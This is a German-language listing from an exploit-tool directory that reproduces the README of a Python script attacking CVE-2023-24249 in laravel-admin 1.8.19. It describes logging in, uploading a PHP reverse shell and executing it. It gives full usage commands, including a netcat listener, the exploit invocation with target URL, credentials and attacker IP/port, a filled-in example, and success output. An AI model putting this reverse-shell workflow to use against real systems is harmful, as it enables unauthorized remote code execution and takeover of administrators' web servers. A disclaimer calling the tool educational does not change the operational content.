Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-24249-Exploit — Exploit-Skript für CVE-2023-24249 - eine Schwachstelle, die Remote-Code-Ausführung über Datei-Upload und Befehlsinjektion ermöglicht. | Kitploit
Tools/GitHubGitHub/iduzzel/cve-2023-24249-exploit
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRemote-Access-Tool
GitHubiduzzel/cve-2023-24249-exploit

CVE-2023-24249-Exploit

Exploit-Skript für CVE-2023-24249 - eine Schwachstelle, die Remote-Code-Ausführung über Datei-Upload und Befehlsinjektion ermöglicht.

Repository anzeigen
91vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-24249 Exploit-Skript

Beschreibung

Dieses Repository enthält ein Exploit-Skript für CVE-2023-24249, eine kritische Schwachstelle in laravel-admin Version 1.8.19. Diese Schwachstelle ermöglicht das beliebige Hochladen von Dateien (Arbitrary File Upload), wodurch Angreifer über eine manipulierte PHP-Datei beliebigen Code ausführen können. Der Exploit demonstriert, wie ein Angreifer eine Reverse Shell auf die Zielanwendung hochladen und ausführen kann, um Remote-Zugriff zu erlangen.

Details zur Schwachstelle

CVE-2023-24249 ist eine Schwachstelle für beliebiges Datei-Hochladen (Arbitrary File Upload) in laravel-admin v1.8.19. Diese Schwachstelle erlaubt Angreifern, beliebige PHP-Dateien hochzuladen und auszuführen, was zu potenzieller Remote-Codeausführung führen kann.

  • Basis-Score: 7.2 HOCH
  • Vektor: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
  • Schwachstellen-Enumeration: CWE-434 - Uneingeschränktes Hochladen von Dateien mit gefährlichem Typ

Referenzen

  • Exploit - Sicherheitshinweis eines Drittanbieters
  • GitHub-Repository von Laravel Admin
  • Offizielle Website von Laravel Admin

Exploit-Skript

Das bereitgestellte Exploit-Skript automatisiert die Ausnutzung von CVE-2023-24249. Es führt die folgenden Schritte aus:

  1. Authentifizieren: Meldet sich mit den bereitgestellten Anmeldedaten an der Zielanwendung an.
  2. Reverse Shell hochladen: Lädt über die verwundbare Datei-Upload-Funktion ein PHP-Reverse-Shell-Skript hoch.
  3. Reverse Shell ausführen: Sendet eine GET-Anfrage an das hochgeladene Reverse-Shell-Skript, um es auszuführen und eine Verbindung zurück zum Rechner des Angreifers herzustellen.

Voraussetzungen

  • Python 3
  • requests-Bibliothek
  • beautifulsoup4-Bibliothek

Installiere die erforderlichen Bibliotheken mit pip:

root@kitploit:~
pip install requests beautifulsoup4

Verwendung

  1. Repository klonen:

    root@kitploit:~
    git clone https://github.com/IDUZZEL/CVE-2023-24249-Exploit.git
    cd CVE-2023-24249-Exploit
    
  2. Listener auf deinem Rechner starten:

    root@kitploit:~
    nc -lvnp <PORT>
    
  3. Exploit-Skript ausführen:

    root@kitploit:~
    python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -i <YOUR_IP> -p <YOUR_PORT>
    

    Ersetze <TARGET_URL>, <USERNAME>, <PASSWORD>, <YOUR_IP> und <YOUR_PORT> durch die entsprechenden Werte:

    • <TARGET_URL>: Die URL der Zielanwendung.
    • <USERNAME>: Der Benutzername für die Authentifizierung.
    • <PASSWORD>: Das Passwort für die Authentifizierung.

Beispiel

root@kitploit:~
python3 exploit.py -u http://admin.iduzzel.com -U admin -P iduzzel -i 10.10.14.13 -p 1337

Skriptausgabe

Wenn der Exploit erfolgreich ist, gibt das Skript Folgendes aus:

root@kitploit:~
[+] Reverse shell uploaded successfully! Attempting to execute it...
[+] Reverse shell executed successfully! Check your listener at <YOUR_IP>:<YOUR_PORT>

Haftungsausschluss

Dieses Skript dient ausschließlich Bildungszwecken. Die unbefugte Verwendung dieses Skripts gegen ein System ohne ausdrückliche Erlaubnis ist illegal und unethisch. Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Skript verursacht werden.

Tool herunterladen
  • <YOUR_IP>: Deine IP-Adresse, um die Reverse-Shell-Verbindung zu empfangen.
  • <YOUR_PORT>: Der Port, auf dem dein Listener läuft.